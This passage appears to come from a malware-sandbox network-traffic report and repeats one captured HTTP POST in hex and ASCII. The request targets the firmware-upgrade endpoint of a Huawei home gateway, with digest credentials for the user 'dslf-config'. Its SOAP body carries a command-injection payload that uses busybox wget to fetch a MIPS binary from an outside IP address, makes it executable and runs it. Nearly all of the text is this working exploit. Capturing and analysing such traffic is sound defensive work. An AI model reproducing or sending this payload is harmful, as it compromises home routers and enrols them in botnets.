6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 34 2e 31 35 36 2e 37 31 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 70 64 65 66 61 75 6c 74 2f 74 34 70 30 6e 74 30 37 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 3b 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 68 75 61 77 65 69 2e 65 78 70 6c 6f 69 74 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 94.156.71.59 -l /tmp/.unstable -r /t4t4t4t4t4t4t4t4t4t4t4t4t4pdefault/t4p0nt07.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
              Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 34 2e 31 35 36 2e 37 31 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 70 64 65 66 61 75 6c 74 2f 74 34 70 30 6e 74 30 37 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 3b 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 68 75 61 77 65 69 2e 65 78 70 6c 6f 69 74 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 94.156.71.59 -l /tmp/.unstable -r /t4t4t4t4t4t4t4t4t4t4t4t4t4pdefault/t4p0nt07.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
              Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 34 2e 31 35 36 2e 37 31 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 70 64 65 66 61 75 6c 74 2f 74 34 70 30 6e 74 30 37 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 3b 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 68 75 61 77 65 69 2e 65 78 70 6c 6f 69 74 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 94.156.71.59 -l /tmp/.unstable -r /t4t4t4t4t4t4t4t4t4t4t4t4t4pdefault/t4p0nt07.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
              Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 34 2e 31 35 36 2e 37 31 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 70 64 65 66 61 75 6c 74 2f 74 34 70 30 6e 74 30 37 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 3b 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 68 75 61 77 65 69 2e 65 78 70 6c 6f 69 74 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 94.156.71.59 -l /tmp/.unstable -r /t4t4t4t4t4t4t4t4t4t4t4t4t4pdefault/t4p0nt07.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
              Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 34 2e 31 35 36 2e 37 31 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 70 64 65 66 61 75 6c 74 2f 74 34 70 30 6e 74 30 37 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 3b 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 68 75 61 77 65 69 2e 65 78 70 6c 6f 69 74 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 94.156.71.59 -l /tmp/.unstable -r /t4t4t4t4t4t4t4t4t4t4t4t4t4pdefault/t4p0nt07.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
              Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 34 2e 31 35 36 2e 37 31 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 70 64 65 66 61 75 6c 74 2f 74 34 70 30 6e 74 30 37 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 3b 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 68 75 61 77 65 69 2e 65 78 70 6c 6f 69 74 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 94.156.71.59 -l /tmp/.unstable -r /t4t4t4t4t4t4t4t4t4t4t4t4t4pdefault/t4p0nt07.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
              Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 34 2e 31 35 36 2e 37 31 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 70 64 65 66 61 75 6c 74 2f 74 34 70 30 6e 74 30 37 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 3b 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 68 75 61 77 65 69 2e 65 78 70 6c 6f 69 74 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 94.156.71.59 -l /tmp/.unstable -r /t4t4t4t4t4t4t4t4t4t4t4t4t4pdefault/t4p0nt07.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
              Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 34 2e 31 35 36 2e 37 31 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 70 64 65 66 61 75 6c 74 2f 74 34 70 30 6e 74 30 37 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 3b 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 68 75 61 77 65 69 2e 65 78 70 6c 6f 69 74 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 94.156.71.59 -l /tmp/.unstable -r /t4t4t4t4t4t4t4t4t4t4t4t4t4pdefault/t4p0nt07.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
              Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 34 2e 31 35 36 2e 37 31 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 70 64 65 66 61 75 6c 74 2f 74 34 70 30 6e 74 30 37 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 3b 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 68 75 61 77 65 69 2e 65 78 70 6c 6f 69 74 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 